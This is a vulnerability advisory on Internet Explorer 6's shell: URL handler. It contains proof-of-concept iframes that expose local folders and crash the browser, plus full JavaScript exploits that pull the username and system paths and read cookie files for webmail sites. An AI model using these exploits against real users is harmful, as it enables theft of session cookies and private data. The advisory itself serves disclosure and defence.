advisory#1
/--------------------------------------------------------------------/


Vendor:              Microsoft Corp.
product:             IE6-IE6+SP1
Discovery by:        Roozbeh Afrasiabi (roozbeh_afrasiabi@yahoo.com)
Discovery date :     NOV,2000     Reported :MAR,2004
Title:               shell url handler security issues

/--------------------------------------------------------------------/






TABLE OF CONTENTS:
==================

Description & POCS.......................................1

Contact info.............................................2

Disclaimer...............................................3







1)Descrption & pocs
=================

 
shell url handler security issues


1)shell url handler vulnerability:
there exists a security issue with the way internet explorer
operates
urls containing the shell: url handler this can be used to extract
information from victims system which can be done by crafting html
pages that contain the shell url as src or href values,this
vulnerability allows access to certain shell folders for instance :




shell:(shell folder name) ------>the urls generaly look like this
you can find the shell folder names by searching the registry for
"shellfolder" 
shell:windows 
shell:cookies 
shell:recent  
shell:system  
shell:Common AppData
shell:Common Desktop
shell:Common Documents
shell:Common Favorites
shell:Common Programs
shell:Common Start Menu
shell:Common Startup
shell:Common Templates
shell:Common Administrative Tools
shell:CommonVideo
shell:CommonPictures
shell:Personal
shell:local appdata
shell:profile
shell:Administrative Tools

.......

a)


proof of concept:



<iframe id="Target" src='shell:windows' name="x" width="875"
height="527">
</iframe>





this vulnerability alone is not that much harmful for the execution
of only limited files is possible (mainly those that ie normally can
open: *.bmp,*.txt,*.log.*.jpeg,html,...)

it is however possible to change folders or use these shell folders
to get access to other folders on users system :


b)

proof of concept:


<iframe id="Target" src='shell:windows\system32\config\' name="x"
width="875" height="527">
</iframe>



this gives exploits that can write to users system the ability to
create files in exact locations on user 's system.For instance
saving
a trojan horse in the common startup folder which would insure the
start of this program anytime any of the users logon.


2)clsids and shell url handler vulnerability:


shell folders that ie has access to cannot only be accessed using
their shell folder names but also by using clsids pointing to those
folders:

shell:::(clsid)
clsids can be found here:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
[folders]

fonts shell:::{D20EA4E1-3957-11d2-A40B-0C5020524152}
tasks  shell:::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
my computer shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
downloaded files shell:::{88C6C381-2E85-11D0-94DE-444553540000}
search shell:::{E17D4FC0-5564-11D1-83F2-00A0C90DC849} 
{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
IE(homepage) shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
recycle bin shell:::{645FF040-5081-101B-9F08-00AA002F954E} 
network shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D}     
control panel shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D} 
printers shell:::{2227A280-3AEA-1069-A2DE-08002B30309D}
web folders shell:::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} 
connection shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48}
my documents shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}
administrative tools shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153}
briefcase shell:::{85BBD920-42A0-1069-A2E4-08002B30309D}
scanners and cameras shell:::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
cabnet shell:::{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}
startup shell:::{48e7caab-b918-4e58-a94d-505519c795dc}
common startup shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1}
programs folder shell:::{7be9d83c-a729-4d97-b5a7-1b7313c39e0a}
acvtivex folder shell:::{88C6C381-2E85-11D0-94DE-444553540000} 
.........

Note: shell linking when combined with clsids on a local machine can
give users the ability to bypass some restrictions:



start>run>shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}<press
enter>
- - - - - - -->the folder options popsup

c)

proof of concept:

<iframe id="Target"
src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x"
width="875" height="527">
</iframe>



changing directories or folders is also possible in this
vulnerability.


shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\a:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\d:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\e:

d)

proof of concept:

<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x"
width="875" height="527">
</iframe>



it is also possible to change between shell folders using "\::clsid"


e)

proof of concept:


<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}'
name="x" width="875" height="527">
</iframe>



If internet explorer is forced to open the " shell storage folder
viewer " using this method it would cause internet explorer to crash
which would close all open windows :

f)


proof of concept:


<iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'
name="x" width="875" height="527">
</iframe>



programs like "Net meeting" can somehow be run using this method:


g)


proof of concept:


<a target="_blank"
href="shell:::{3E9BAF2D-7A79-11d2-9334-0000F875AE17}">click</a>



*it is also possible to start msn messenger but the fact that other
programs can be run or not
has not been tested.





3)\shdoclc.dll\ vulnerability:

when known files on user 's system is accessed using (shell:(shell
folder name) or shell:::(clsid))
internet explorer dose not open the file according to its filetype
but reacts towards it as if it has been asked to download that file
from the location this is correct as far as ie itself cannot open
that file (*.gif,*.bmp,*.txt,... for instance *.txt is opened using
notepad). When this happens the page that has tried to open the file
causes an error which res://C:\WINHOLEZ\System32\shdoclc.dll\
responds to, the url of the page generated by shdoclc.dll contains
the location of that file which can reveal important information.


h)

proof of concept:

IE 6
IE 6+sp1


<html>
<head>
</head>
<body onload=setTimeout("exploit()",4*100);>
<iframe id="Target" width="0" height="0"
src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
function exploit(){ 
loc=new String(Target.location);
var len=loc.length
var n=loc.indexOf("Settings")+9;
var m=loc.indexOf("System32");
preuser=new String(loc.substring(n,len));
p=preuser.indexOf("\\");
user=new String(preuser.substring(0,p));
winloc=new String(loc.substring(6,m));
q=winloc.indexOf("\\");
rootdrive=new String(winloc.substring(0,q+1));
targetwin=window.open("");
targetwin.document.write("<b>Username :</b> "+user+"<br>");
targetwin.document.write("<b>root drive :</b> "+rootdrive+"<br>")
targetwin.document.write("<b>location of windows folder :</b>
"+winloc+"<br>")
targetwin.document.write("<b>location of user profile
:</b>"+rootdrive+"Documents and Settings\\"+user+"\\");
targetwin.document.write("<br><br><b>Wallpaper :</b><br><br><img
border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local
Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30%
height=30%>")
targetwin.document.write("<br><br><b>internet explorer wallpaper
:</b><br><br><img border=0 src='"+rootdrive+"Documents and
Settings\\"+user+"\\Application Data\\Microsoft\\Internet
Explorer\\Internet Explorer Wallpaper.bmp' width=30%
height=30%><br><br>")
}
</SCRIPT>
</body>
</html>




i)


proof of concept:

(reading cookies )

IE 6 only
*on IE6+sp1 the exploit won't work because cookies folder cannot be
accessed,this is due to the fact that cookies folder is set to be
part of restricted sites for which security level is high and the
script won't be affective.


<html>
<head>
</head>
<body onload=setTimeout("exploit()",4*100);>
<iframe id="Target" width="0" height="0"
src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
function exploit(){ 
loc=new String(Target.location);
var len=loc.length
var n=loc.indexOf("Settings")+9;
var m=loc.indexOf("System32");
preuser=new String(loc.substring(n,len));
p=preuser.indexOf("\\");
user=new String(preuser.substring(0,p));
winloc=new String(loc.substring(6,m));
q=winloc.indexOf("\\");
rootdrive=new String(winloc.substring(0,q+1));
targetwin=window.open("");
targetwin.document.write("<b>Username :</b> "+user+"<br>");
targetwin.document.write("<b>root drive :</b> "+rootdrive+"<br>")
targetwin.document.write("<b>location of windows folder :</b>
"+winloc+"<br>")
targetwin.document.write("<b>location of user profile
:</b>"+rootdrive+"Documents and Settings\\"+user+"\\");
targetwin.document.write("<br><br><b>Wallpaper :</b><br><br><img
border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local
Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30%
height=30%>")
targetwin.document.write("<br><br><b>internet explorer wallpaper
:</b><br><br><img border=0 src='"+rootdrive+"Documents and
Settings\\"+user+"\\Application Data\\Microsoft\\Internet
Explorer\\Internet Explorer Wallpaper.bmp' width=30%
height=30%><br><br>")

var k=0;
Targeturln=new Array("");
Targeturl=new Array("");
Targeturln[0]="yahoo"
Targeturln[1]="hotmail"
Targeturln[2]="antionline" 
do{
Targeturl=Targeturln[k];
contentx=new Array(x(Targeturl));
if(contentx!="") {
targetwin.document.write("<br><br><b><font size=5>Contents of the
cookie file(s) related to
"+Targeturl+"</font></b><br><br><br><font>"+contentx+"</font><br><br>");
}
if(contentx==""){
targetwin.document.write("<b><br><br><font size=5>No files found
related to "+Targeturl+"</font></b><br><br>");
}
k++;
}while(k<3);
return false;
}


function x(url){
content=new Array("");
var i=0;
do{
cookie=window.open("shell:profile\\Local
Settings\\Temp\\cookies\\"+user+"@"+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"<br>"+user+"@"+url+"["+i+"].txt
:"+"<br><br>"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
i=0;
do{
cookie=window.open("shell:profile\\Local
Settings\\Temp\\cookies\\"+user+"@www"+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"<br>"+user+"@www."+url+"["+i+"].txt
:"+"<br><br>"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
return content;
}


</SCRIPT>
</body>
</html>



2)Contact Info
==================

roozbeh_afrasiabi@yahoo.com
da_stone_cold_killer@yahoo.com


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.96rc1

mQGiBEBVbGoRBACT+S7j6awJjH8ctpioGfdmQzfwxd/M5vcafFpWjYTb2g4NINfB
gzbXFANzOMDcXhmrQysvgeFl7smhFVKDl0c7dtsqvgn5pydfXRCljZwrSQAwE/PS
vSSzV7QhEI5zLWkpieyjZhlxCYtHlxma36pBx3ZpPPDfAFNpW0QBB94rxwCgoZO9
TR/YXs19bOipfffI02dv758EAILHfEHXNkb050yaU8y47JJXl64OOnQcwgNafLa4
cEyYSRYwkZUqnBX6xmB/hy8J9AnmED7tjKLSqrupJivrxueSwbNom+QN2cPpWv+i
MZXGgMLZAOrlAi4R7gGBAIq7K+Ow0Z4/FQMH3Aryw9WkBlDK7bChfLeoAXNrQAWG
kfgKA/47WQN0SAD9KSmbdMB6q8EE7sD7vYkZWIg+j4JJaWskdN7qCbSB6EBnWKQb
6gE2999nlphhmcUjS1TgjUgCLHjQ9lMIWr0Zec8NmcZyEVnEKgjHK7MkvocLpT7h
zYkVMO9HLecllYr6FrnNtWpOw/X7FVhSkNIKgNNZQ0Z3Xi3Z57RQcm9vemJlaCBh
ZnJhc2lhYmkgKHJvb3piZWhfYWZyYXNpYWJpQHlhaG9vLmNvbSkgPGRhX3N0b25l
X2NvbGRfa2lsbGVyQHlhaG9vLmNvbT6IWQQTEQIAGQUCQFVsagQLBwMCAxUCAwMW
AgECHgECF4AACgkQLh+KhhfWhDXgTwCeKAVoNkUjYqBbWu+l3WfArf4+vwkAoIjx
rBC/FnLEJDuSJ5SuLho04QtOuOsEQFVscwEHAL5OyxFo1eAwGijoPfIwQPINLuvr
bo7WVzwGmUXvvZsbLvMjc80zdUD2PaZr1kurZwqE13If+XzpNZdlFfmjtYKST+s8
8lwnzK2ososE0m4uT1MatHQxK3HNKIDRUOg7TC8PaPD+FUYntcdUYs3bdror7179
kOIfM7/ZtCQuWoqFMOZiCTd7PUSgmEXsUWoNzlNmGJmZMgSc0MtAFiGDys3sA5fK
8JyOA0rQHvmcne1Xh9P4aA9+mutSGnx/4mFPYLdDFBA5go5B0XOPrjQelxQlRAAU
xmWk0kgx+X25WRK/AAYpiEYEGBECAAYFAkBVbHMACgkQLh+KhhfWhDUH4wCfZ/83
xkEvaT1IWeaDemU5dYAysPsAnRP6Qyw1DM3gHhxl6m+bjEwPX6AG
=q+hK
-----END PGP PUBLIC KEY BLOCK-----


3)Disclaimer
==================


Roozbeh Afrasiabi is not responsible for the misuse of the information provided in 
this report. In no event shall the author be liable for any damages whatsoever 
arising out of or in connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


                                                                                 All Rights Reserved